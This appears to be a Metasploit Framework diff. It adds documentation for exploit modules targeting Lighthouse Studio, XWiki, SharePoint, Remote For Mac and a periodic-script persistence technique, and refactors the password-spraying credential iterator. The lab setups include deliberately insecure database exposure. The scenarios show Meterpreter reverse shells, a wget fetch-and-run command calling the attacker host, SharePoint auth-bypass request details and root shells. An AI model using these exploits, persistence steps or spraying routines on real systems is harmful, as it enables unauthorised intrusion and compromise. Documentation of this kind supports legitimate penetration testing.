+write_enable=YES
+
+chroot_local_user=YES
+allow_writeable_chroot=YES
+
+user_sub_token=$USER
+local_root=/var/www/html
+
+local_umask=022
+file_open_mode=0644
+```
+
+Then restart the FTP service:
+
+```
+sudo systemctl restart vsftpd
+sudo systemctl enable vsftpd
+```
+
+9. Configure MySQL Access
+
+Create a Test User and Database
+
+Login to MySQL:
+
+```
+sudo mysql -u root
+```
+
+Then execute:
+
+```
+CREATE USER 'test'@'%' IDENTIFIED BY 'test';
+CREATE DATABASE test DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
+GRANT ALL PRIVILEGES ON test.* TO 'test'@'%';
+FLUSH PRIVILEGES;
+EXIT;
+```
+
+Allow External MySQL Connections
+
+Edit the MySQL config:
+
+```
+sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf
+```
+
+Find the line:
+
+```
+bind-address = 127.0.0.1
+```
+
+Change it to:
+
+```
+bind-address = 0.0.0.0
+```
+
+Save and exit, then allow MySQL traffic through the firewall:
+
+```
+sudo ufw allow 3306/tcp
+```
+
+Restart MySQL:
+
+```
+sudo systemctl restart mysql
+```
+
+10. Configure Apache for CGI Scripts
+
+Update Apache Virtual Host
+
+Edit the default site config:
+
+```
+sudo nano /etc/apache2/sites-enabled/000-default.conf
+```
+
+Inside the `<VirtualHost *:80>` block, add:
+
+```
+ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/
+
+<Directory "/var/www/html/cgi-bin">
+    AllowOverride None
+    Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
+    Require all granted
+</Directory>
+```
+
+Restart Apache
+
+```
+sudo systemctl restart apache2
+```
+
+Now CGI scripts in /var/www/html/cgi-bin/ should be executable.
+
+### Create the Lighthouse Survey
+
+1. Download and Install Windows (on Second VM)
+
+Download Windows 10 ISO from the official Microsoft site:
+https://www.microsoft.com/en-us/software-download/windows10
+
+Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.).
+
+2. Download and Install Vulnerable Lighthouse Studio
+
+This is the vulnerable application used to build and upload surveys.
+
+https://d2rpjb6zne1wug.cloudfront.net/software-installers/Lighthouse-Studio/LighthouseStudio_9_16_12_Setup.exe
+
+The version history page is available at:
+https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio/version-history
+
+Install Lighthouse Studio using default options.
+
+3. Create and Save a New Study
+
+Use
+
+```
+File -> New Study
+```
+
+and follow instructions.
+In the end save the study.
+
+4. Upload the Study to the Ubuntu VM
+
+To host your survey on the Ubuntu VM:
+
+In the Top Bar -> Click on Hosting
+
+Set the following database configuration:
+
+Database Name: `test`
+
+Database Username: `test`
+
+Database Password: `test`
+
+Database Server: `MySQL`
+
+Set FTP Access
+
+Fill in the FTP settings:
+
+FTP Host: `IP address or hostname of your Ubuntu VM`
+
+Username: `ftpuser`
+
+Password: password for `ftpuser`
+
+In the "Advanced" Tab
+
+Set the Database Server Host Name — enter the IP address of your Ubuntu VM.
+
+5. Upload the Survey to Server
+
+Click the "Upload Survey to Server" button.
+
+If all configurations are correct, Lighthouse Studio will:
+
+- Upload the survey files via FTP
+- Initialize the MySQL database
+- Generate CGI scripts
+
+OR (in case of any errors)
+
+Use this instruction to upload manually [Manual Upload to Server](https://sawtoothsoftware.com/help/lighthouse-studio/manual/manual-upload.html)
+
+## Setup a Windows Server to Host Lighthouse Survey
+
+1. Install xampp
+
+2. Place survey for manual upload in c:\xampp\htdocs\
+
+3. Install Perl 5.38
+
+- Avoid installing 5.40 as it's missing some essential MySQL libraries required to connect the Lighthouse survey to database which is required in order to exploit this vulnerability
+
+3. The `.pl` and `.cgi` files LightHouse generates will start with `#!/usr/bin/perl` which Windows will fail to interpret
+- Either find and replace these with `#!C:/Strawberry/perl/bin/perl.exe` or edit the apache config such that Apache will always send these files to Strawberry Perl
+ 
+
+4. Make the same edits to the Apache config as you would do on Linux to make the cgi scripts executable
+
+5. Install the same Perl modules as you would during the Linux install
+
+6. In phpMyAdmin, create the DB user and DB specified in the Survey you created in Lighthouse
+
+7. Ensure the user has the necessary privileges over the DB
+
+8. Navigate the to the /<SurveyName>/WebUpload/cgi-bin/admin.pl endpoint in the survey, authenticate with the admin credentials and ensure the the DB is connected and there were no errors durning setup
+
+## Scenario
+
+```
+msf6 > use exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > show options
+
+Module options (exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300):
+
+   Name       Current Setting     Required  Description
+   ----       ---------------     --------  -----------
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                  yes       The target port (TCP)
+   SSL        false               no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   STUDYNAME                      no        Value for the hid_studyname GET parameter
+   TARGETURI  /cgi-bin/ciwweb.pl  yes       Path to vulnerable ciwweb.pl
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set RHOSTS 192.168.19.129
+RHOSTS => 192.168.19.129
+msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set STUDYNAME 123
+STUDYNAME => 123
+msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set LHOST eth0
+LHOST => 192.168.19.130
+msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set SRVPORT 9999
+SRVPORT => 9999
+msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Extracting version...
+[*] Extracted version: 9.16.12
+[+] The target appears to be vulnerable.
+[*] Uploading malicious payload...
+[*] Command Stager progress -  44.31% done (362/817 bytes)
+[*] Uploading malicious payload...
+[*] Sending stage (3045380 bytes) to 192.168.19.129
+[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.129:39790) at 2025-07-20 07:04:31 -0400
+[*] Command Stager progress -  97.31% done (795/817 bytes)
+[*] Uploading malicious payload...
+[*] Command Stager progress - 100.00% done (817/817 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.19.129
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+
+```
@@ -0,0 +1,119 @@
+## Vulnerable Application
+
+This module exploits a template injection vulnerability in the the XWiki Platform.
+XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine. 
+The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
+
+This vulnerability affects XWiki Platform versions >= 5.3‑milestone‑2 and < 15.10.11, and versions >= 16.0.0‑rc‑1 and < 16.4.1.
+Successful exploitation may result in the remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+An attacker can execute arbitrary system commands in the context of the user running the web server.
+
+## Testing
+
+### Setup a Linux Server to Host the XWiki
+
+To set up a test environment:
+
+1. Download and Install Ubuntu 18.04.6 LTS
+
+Download the ISO from the official Ubuntu archive:
+https://releases.ubuntu.com/18.04/
+
+2. Install OpenJDK 17
+
+```
+wget https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.9%2B9/OpenJDK17U-jdk_x64_linux_hotspot_17.0.9_9.tar.gz
+sudo mkdir -p /opt/java
+sudo tar -xzf OpenJDK17U-jdk_x64_linux_hotspot_17.0.9_9.tar.gz -C /opt/java
+export JAVA_HOME=/opt/java/jdk-17.0.9+9
+export PATH=$JAVA_HOME/bin:$PATH
+```
+
+3. Download and Unpack Vulnerable XWiki
+
+```
+wget https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwiki-platform-distribution-flavor-jetty-hsqldb/15.10.5/xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+```
+
+```
+unzip xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+```
+
+4. Run XWiki
+
+Go to the directory where you've unpack archive and run `start_xwiki.sh`
+
+### Setup a Windows Server to Host XWiki
+
+1. Download and Install Windows
+
+Download Windows 10 ISO from the official Microsoft site:
+https://www.microsoft.com/en-us/software-download/windows10
+
+Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.).
+
+2. Install OpenJDK 17
+
+Download `.msi` file from this page
+
+```
+https://learn.microsoft.com/en-us/java/openjdk/download#openjdk-17
+```
+
+and install
+
+3. Download and Unpack Vulnerable XWiki
+
+```
+https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwiki-platform-distribution-flavor-jetty-hsqldb/15.10.5/xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+```
+
+Open with 7-zip or another archiver and unpack
+
+4. Run XWiki
+
+Go to the directory where you've unpack archive and run `start_xwiki.bat`
+
+## Scenario
+
+```
+msf6 > use multi/http/xwiki_unauth_rce_cve_2025_24893
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > set RHOSTS 192.168.19.136
+RHOSTS => 192.168.19.136
+msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > run verbose=true
+
+[*] Command to run on remote host: wget -qO ./oXsSiyiPG http://192.168.19.130:8080/TZr1rd35vcaOY2R1ivAgxA; chmod +x ./oXsSiyiPG; ./oXsSiyiPG &
+[*] Fetch handler listening on 192.168.19.130:8080
+[*] HTTP server started
+[*] Adding resource /TZr1rd35vcaOY2R1ivAgxA
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Extracting version...
+[*] Extracted version: 15.10.5
+[+] The target appears to be vulnerable.
+[*] Building command for target...
+[*] Uploading malicious payload...
+[*] Client 192.168.19.136 requested /TZr1rd35vcaOY2R1ivAgxA
+[*] Sending payload to 192.168.19.136 (Wget/1.19.4 (linux-gnu))
+[*] Client 192.168.19.136 requested /TZr1rd35vcaOY2R1ivAgxA
+[*] Sending payload to 192.168.19.136 (Wget/1.19.4 (linux-gnu))
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.19.136
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.19.136
+[-] Failed to load client portion of stdapi.
+[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.136:36512) at 2025-08-23 23:42:12 -0400
+
+[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.136:36510) at 2025-08-23 23:42:12 -0400
+meterpreter > sysinfo
+Computer     : 192.168.19.136
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,62 @@
+## Description
+
+This module provides a persistence mechanism on OSX, BSD and Arch Linux 
+using periodic scripts. The modules will write a script to `/etc/periodic
+/daily/`, `/etc/periodic/weekly/` or `/etc/periodic/monthly/`. This 
+script will then execute a payload which is written by default to `/tmp/`.
+
+## Verification Steps
+
+1. Obtain a session with super user privilleges, only the root 
+user has write permissions to `/etc/periodic/`
+2. Do: `use exploit/multi/local/periodic_script_persistence`
+3. Do: `set session #`
+4. Do: `set target #`
+5. Do: `set payload #`
+6. Do: `set verbose true`
+7. Do: `expoit`
+
+## Options
+
+### PERIODIC_DIR
+
+Periodic Directory to write script eg. /etc/periodic/daily
+
+### PERIODIC_SCRIPT_NAME
+
+Name of periodic script
+
+
+
+## Scenarios
+```
+msf6 exploit(multi/local/periodic_script_persistence) > set session 1
+session => 1
+msf6 exploit(multi/local/periodic_script_persistence) > run verbose=true 
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. /etc/periodic/daily/ is writable
+[*] Writing '/etc/periodic/daily/jX3dG9' (118 bytes) ...
+[*] Succesfully wrote periodic script to /etc/periodic/daily/jX3dG9.
+[*] Cleanup command 'sudo rm/etc/periodic/daily/jX3dG9'
+msf6 exploit(multi/local/periodic_script_persistence) > handler -p cmd/unix/reverse_zsh -P 4444 -H ens39
+[*] Payload handler running as background job 4.
+
+msf6 exploit(multi/local/periodic_script_persistence) > [*] Started reverse TCP handler on 192.168.168.219:4444 
+[*] Command shell session 6 opened (192.168.168.219:4444 -> 192.168.168.175:49190) at 2025-08-29 17:49:54 +0200
+msf6 exploit(multi/local/periodic_script_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information           Connection
+  --  ----  ----                 -----------           ----------
+  1         meterpreter x64/osx  root @ mss-Mac.local  192.168.168.219:4242 -> 192.168.168.175:49165 (192.168.168.175)
+  6         shell cmd/unix                             192.168.168.219:4444 -> 192.168.168.175:49190 (192.168.168.175)
+
+msf6 exploit(multi/local/periodic_script_persistence) > sessions 6
+[*] Starting interaction with 6...
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
+```
@@ -0,0 +1,43 @@
+## Vulnerable Application
+
+The Remote For Mac app is a remote control software that allows you to turn your iPhone or iPad into a wireless remote controller for Mac.
+The versions up to 2025.7 are vulnerable to unauthenticated UDP control.
+This allows an attacker to send a sequence of UDP packets to the target and simulate keyboard input,
+leaving an option for remote code execution.
+The app can be downloaded from [here](https://rs.ltd/).
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/osx/misc/remote_for_mac_udp_rce`
+1. Do: `set RPORT [HTTP port of Remote For Mac]`
+1. Do: `set RHOST [target IP address]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `set LPORT [attacker port]`
+1. Do: `run`
+
+## Options
+
+### RPORT
+
+The Remote For Mac spawn HTTPS server on semi-random port.
+The HTTP server provides information about running version and whether the authentication is enabled.
+The same port is also used for UDP protocol - this time, the port translated received packets into keyboard strokes.
+
+## Scenarios
+
+```
+msf6 exploit(osx/misc/remote_for_mac_udp_rce) > run verbose=true
+[*] Started reverse TCP handler on 192.168.168.217:4444
+[*] Simulating system keyboard input to open Terminal...
+[*] Initial sequence finished, waiting for terminal to be spawned..
+[*] Sending malicious payload to be executed...
+[+] Payload sent. Awaiting session...
+[*] Command shell session 3 opened (192.168.168.217:4444 -> 192.168.168.175:49197) at 2025-08-28 08:52:44 +0200
+
+id
+uid=501(ms) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
+
+```
@@ -0,0 +1,191 @@
+## Vulnerable Application
+This module exploits the authentication bypass vulnerabilities `CVE-2025-49706` and `CVE-2025-53771`, and an unsafe
+deserialization vulnerability `CVE-2025-49704`, to achieve unauthenticated RCE against a vulnerable Microsoft
+SharePoint Server. The vulnerability `CVE-2025-53770` was disclosed as being a patch bypass of `CVE-2025-49704`,
+and as described by the finders, `CVE-2025-53770` targets a different endpoint within the `/_vti_bin/` URI path.
+As this exploit module does not target the endpoint associated with `CVE-2025-53770` (per the original finders),
+we believe this module is best described as exploiting `CVE-2025-49704` alone (and not `CVE-2025-53770`).
+
+`CVE-2025-49706` is an authentication bypass affecting Microsoft SharePoint Server, allowing a remote unauthenticated
+attacker to reach the ToolPane page, located at the `/_layouts/15/ToolPane.aspx` URI. The auth bypass works if an
+attacker supplies the following elements to an HTTP request:
+
+* An HTTP Referer header with one of the values `/_layouts/SignOut.aspx`, `/_layouts/14/SignOut.aspx`, or `/_layouts/15/SignOut.aspx`.
+* An HTTP query parameter named `DisplayMode` with the value `Edit`.
+* An HTTP query parameter with any name and the value `/ToolPane.aspx`, so long as this is the last query parameter.
+* An HTTP form parameter named `MSOTlPn_Uri` with the full URL to the `/_controltemplates/15/AclEditor.ascx` endpoint.
+
+`CVE-2025-53771` is a patch bypass for `CVE-2025-49706`. By appending a trailing `/` to the target
+`/_layouts/15/ToolPane.aspx` URI, e.g. `/_layouts/15/ToolPane.aspx/` a remote unauthenticated attacker can reach
+the ToolPane page.
+
+`CVE-2025-49704` is an unsafe deserialization vulnerability due to bypassing a filter list to allow the instantiation of
+`LosFormatter` and `ObjectDataProvider` in the `diffgr:diffgram` XML document, allowing us to kick off a second
+stage deserialization gadget (which will be a `TypeConfuseDelegate` + `LosFormatter` gadget chain).
+
+The July 8, 2025, patch for `CVE-2025-49704` did not apply correctly to a SharePoint site that had not also manually run
+a SharePoint configuration update. The patch for `CVE-2025-49704` did not address the root cause, and instead marked the
+`Microsoft.PerformancePoint.Scorecards.Client` assembly as unsafe. The July 19, 2025, patch for `CVE-2025-53770`
+addresses the root cause of `CVE-2025-49704` and does not rely on a manual configuration update to be performed in
+order to be affective.
+
+## Testing
+This exploit module has been successfully tested against the following versions:
+
+* SharePoint Server 2019 `16.0.10337.12109` - This is the RTM version. Is vulnerable to all 4 CVEs. Exploitation
+is reliable.
+* SharePoint Server 2019 `16.0.10417.20018` - This is the June 2025 patch level (`KB 5002729)`. Is vulnerable to
+all 4 CVEs. Exploitation is reliable.
+* SharePoint Server 2019 `16.0.10417.20027` - This is the July 2025 patch level (`KB 5002741`). This patched
+out `CVE-2025-49704` and `CVE-2025-49706`, but is vulnerable to `CVE-2025-53770` and `CVE-2025-53771`. Exploitation is
+reliable **unless the site administrator has manually performed a configuration update**.
+
+### Setup
+
+Installing Microsoft SharePoint is non-trivial. This [setup guide](https://gist.github.com/testanull/e1573437f91ec3726ab5041389c6f28d)
+is a great step-by-step tutorial to get up and running.
+
+After you install SharePoint, you must create a new site, bound to a new port. This is what the exploit will target.
+
+_NOTE: If you enable HTTPS, you will need to manually setup certificates via IIS Manager._
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/windows/http/sharepoint_toolpane_rce`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>`
+5. `set SSL true` (If targeting HTTPS)
+
+Configure the payload:
+
+_NOTE: If testing with the default Meterpreter payloads, you will likely need to disable Defender._
+
+6. `set PAYLOAD cmd/windows/http/x64/meterpreter_reverse_tcp`
+7. `set LHOST eth0`
+8. `set LPORT 4444`
+
+Run the exploit:
+
+9. `check`
+10. `exploit`
+
+## Scenarios
+
+### Example 1 (cmd/windows/http/x64/meterpreter_reverse_tcp)
+
+```
+msf exploit(windows/http/sharepoint_toolpane_rce) > show options 
+
+Module options (exploit/windows/http/sharepoint_toolpane_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ccMNrNsj         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.86.122   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(windows/http/sharepoint_toolpane_rce) > check
+[*] 192.168.86.50:80 - The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
+msf exploit(windows/http/sharepoint_toolpane_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
+[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.50:62290) at 2025-07-23 12:58:41 +0100
+
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : TESTDOMAIN
+Logged On Users : 24
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > 
+```
+
+### Example 2 (cmd/windows/generic)
+
+```
+msf exploit(windows/http/sharepoint_toolpane_rce) > show options 
+
+Module options (exploit/windows/http/sharepoint_toolpane_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/windows/generic):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+   CMD   notepad.exe      yes       The command string to execute
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
+[*] Exploit completed, but no session was created.
+msf exploit(windows/http/sharepoint_toolpane_rce) >
+```
+
+You will be able to observe in Task Manager or Process Explorer that the `w3wp.exe` process has spawned `cmd.exe` which
+has spawned `notepad.exe`.
@@ -212,23 +212,6 @@ module Metasploit::Framework
    #   @return [Boolean]
    attr_accessor :anonymous_login

-    # @!attribute ignore_private
-    #   Whether to ignore private (password). This is usually set when Kerberos
-    #   or Schannel authentication is requested and the credentials are
-    #   retrieved from cache or from a file. This attribute should be true in
-    #   these scenarios, otherwise validation will fail since the password is not
-    #   provided.
-    #   @return [Boolean]
-    attr_accessor :ignore_private
-
-    # @!attribute ignore_public
-    #   Whether to ignore public (username). This is usually set when Schannel
-    #   authentication is requested and the credentials are retrieved from a
-    #   file (certificate). This attribute should be true in this case,
-    #   otherwise validation will fail since the password is not provided.
-    #   @return [Boolean]
-    attr_accessor :ignore_public
-
    # @option opts [Boolean] :blank_passwords See {#blank_passwords}
    # @option opts [String] :pass_file See {#pass_file}
    # @option opts [String] :password See {#password}
@@ -257,29 +240,29 @@ module Metasploit::Framework
    # @yieldparam credential [Metasploit::Framework::Credential]
    # @return [void]
    def each_filtered
-      if ignore_private
-        if ignore_public
-          yield Metasploit::Framework::Credential.new(public: nil, private: nil, realm: realm)
-        else
-          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm)
-        end
-      elsif password_spray
-        each_unfiltered_password_first do |credential|
-          next unless self.filter.nil? || self.filter.call(credential)
+      each_unfiltered do |credential|
+        next unless self.filter.nil? || self.filter.call(credential)

-          yield credential
-        end
-      else
-        each_unfiltered_username_first do |credential|
-          next unless self.filter.nil? || self.filter.call(credential)
-
-          yield credential
-        end
+        yield credential
      end
    end

    alias each each_filtered

+    def each_unfiltered(&block)
+      prepended_creds.each { |c| yield c }
+
+      if anonymous_login
+        yield Metasploit::Framework::Credential.new(public: '', private: '', realm: realm, private_type: :password)
+      end
+
+      if password_spray
+        each_unfiltered_password_first(&block)
+      else
+        each_unfiltered_username_first(&block)
+      end
+    end
+
    # When password spraying is enabled, do first passwords then usernames
    #  i.e.
    #   username1:password1
@@ -293,117 +276,72 @@ module Metasploit::Framework
    # @yieldparam credential [Metasploit::Framework::Credential]
    # @return [void]
    def each_unfiltered_password_first
-      if user_file.present?
-        user_fd = File.open(user_file, 'r:binary')
-      end
-
-      prepended_creds.each { |c| yield c }
-
-      if anonymous_login
-        yield Metasploit::Framework::Credential.new(public: '', private: '', realm: realm, private_type: :password)
-      end
-
-      if user_as_pass
-        if user_fd
-          user_fd.each_line do |user_from_file|
-            user_from_file.chomp!
-            yield Metasploit::Framework::Credential.new(public: user_from_file, private: user_from_file, realm: realm, private_type: private_type(password))
-          end
-          user_fd.seek(0)
+      if nil_passwords
+        each_username do |username|
+          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm, private_type: :password)
        end
      end

      if password.present?
-        if nil_passwords
-          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm, private_type: :password)
-        end
-        if username.present?
+        each_username do |username|
          yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm, private_type: private_type(password))
        end
-        if user_as_pass
+      end
+
+      if user_as_pass
+        each_username do |username|
          yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm, private_type: :password)
        end
-        if blank_passwords
+      end
+
+      if blank_passwords
+        each_username do |username|
          yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm, private_type: :password)
        end
-        if user_fd
-          user_fd.each_line do |user_from_file|
-            user_from_file.chomp!
-            yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm, private_type: private_type(password))
-          end
-          user_fd.seek(0)
-        end
      end

      if pass_file.present?
        File.open(pass_file, 'r:binary') do |pass_fd|
          pass_fd.each_line do |pass_from_file|
            pass_from_file.chomp!
-            if username.present?
-              yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: :password)
-            end
-            next unless user_fd

-            user_fd.each_line do |user_from_file|
-              user_from_file.chomp!
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
+            each_username do |username|
+              yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
            end
-            user_fd.seek(0)
          end
        end
      end

-      if userpass_file.present?
-        File.open(userpass_file, 'r:binary') do |userpass_fd|
-          userpass_fd.each_line do |line|
-            user, pass = line.split(" ", 2)
-            if pass.blank?
-              pass = ''
-            else
-              pass.chomp!
-            end
-            yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
-          end
-        end
+      each_user_pass_from_userpass_file do |user, pass|
+        yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
      end

      additional_privates.each do |add_private|
-        if username.present?
+        each_username do |username|
          yield Metasploit::Framework::Credential.new(public: username, private: add_private, realm: realm, private_type: private_type(add_private))
        end
-        user_fd.each_line do |user_from_file|
-          user_from_file.chomp!
-          yield Metasploit::Framework::Credential.new(public: user_from_file, private: add_private, realm: realm, private_type: private_type(add_private))
-        end
-        user_fd.seek(0)
+      end
+    end
+
+    # Iterates over all possible usernames
+    def each_username
+      if username.present?
+        yield username
      end

-      additional_publics.each do |add_public|
-        if password.present?
-          yield Metasploit::Framework::Credential.new(public: add_public, private: password, realm: realm, private_type: private_type(password) )
-        end
-        if user_as_pass
-          yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: :password)
-        end
-        if blank_passwords
-          yield Metasploit::Framework::Credential.new(public: add_public, private: "", realm: realm, private_type: :password)
-        end
-        if nil_passwords
-          yield Metasploit::Framework::Credential.new(public: add_public, private: nil, realm: realm, private_type: :password)
-        end
-        if user_fd
+      if user_file.present?
